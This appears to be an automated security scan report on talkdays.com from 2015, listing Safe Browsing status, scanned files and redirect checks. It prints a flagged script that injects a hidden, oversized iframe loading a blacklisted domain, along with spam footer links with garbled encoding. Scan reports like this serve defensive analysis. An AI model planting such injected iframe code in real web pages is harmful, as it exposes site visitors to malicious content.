Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=talkdays.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://talkdays.com/ | 200 OK Content-Length: 36035 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: q8wg.clo2jyj.com ...[3726 bytes skipped]... </div> <div class="footer"> <div class="friendlink"> <ul> <li><a href="http://q8q9.679979.cn/" target='_black'>ÊÖ»úÐͺÅʶ±ðÈí¼þ</a></li> <li><a href="http://l8euf.bjxdpig.com/" target='_black'>javaÊÖ»ú¶ÁÊéÈí¼þ</a></li> <li><a href="http://q8wg.clo2jyj.com/" target='_black'>°²×¿ÊÖ»ú³é½±Èí¼þ</a></li> <li><a href="http://26w4l.536017.cn/" target='_black'>ÆóÒµ¶Ô²úÆ·¶¨Î»µÄÉèÏë</a></li> <li><a href="http://e33i.304895.cn/" target='_black'>º«Ê½Î¢´´ ¶¨Î»</a></li> <li><a href="http://lhxykr.335357.cn/" target='_black'>¼àÌýiphoneÊÖ»ú</a></li> </ul> </div> ...[178 bytes skipped]... | ||
http://talkdays.com/aa.js | 200 OK Content-Length: 334 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: 70334.com document.write("<table width=\"1003\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\" >");
document.write("<div align='center'><iframe frameBorder='0' scrolling='no' src='http://70334.com' width='100%' allowTransparency='true' height='3800'></iframe></div>"); document.write ('</tr>') document.write ('</table>') Decoded script: <table width="1003" border="0" align="center" cellpadding="0" cellspacing="0" ><div align='center'><iframe frameBorder='0' scrolling='no' src='http://70334.com' width='100%' allowTransparency='true' height='3800'></iframe></div></tr></table> Malicious iFrame found. size: 100x3800 src: http://70334.com This URL is marked by Google as suspicious <iframe frameborder='0' scrolling='no' src='http://70334.com' width='100%' allowtransparency='true' height='3800'> | ||
http://web.nba1001.net:8888/tj/tongji.js | 500 Can't connect to web.nba1001.net:8888 Content-Length: 192 Content-Type: text/plain | clean |
http://web.nba1001.net:8888/test404page.js | 500 Can't connect to web.nba1001.net:8888 Content-Length: 192 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: talkdays.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Mar 2015 21:38:23 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: talkdays.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 Mar 2015 21:38:23 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: talkdays.com
Referer: http://www.google.com/search?q=talkdays.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: talkdays.com
Referer: http://www.google.com/search?q=talkdays.com
Result:
The result is similar to the first query. There are no suspicious redirects found.